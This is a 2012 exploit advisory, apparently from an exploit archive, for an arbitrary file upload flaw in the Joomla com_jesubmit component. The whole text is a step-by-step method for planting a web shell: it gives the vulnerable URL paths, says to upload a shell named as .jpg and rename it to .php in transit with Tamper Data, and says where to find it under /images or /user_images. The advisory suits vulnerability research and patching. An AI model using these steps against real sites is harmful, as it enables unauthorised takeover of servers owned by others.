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Joomla Jesubmit Shell Upload

Posted on 25 January 2012

# Exploit Title: Joomla Component (com_jesubmit) Arbitrary File Upload # Date: 1/24/2012 # Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net ) # Tested on: [Linux/Windows 7] ############################################################## Exploit: #Visit the website #Navigate to index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en or #index.php/component/option,com_jesubmit/Itemid,[id]/view,jesubmit/ #Upload your shell with the extention .jpg #Use Tamper Data to change the extention to .php #Locate your shell by inspecting the source, (Usually /images or /user_images) it will still have the .jpg extention in the path, just change the extention in the URL. ############################################################## www.areyousecure.net www.websiteauditing.org # Shouts to the Belegit crew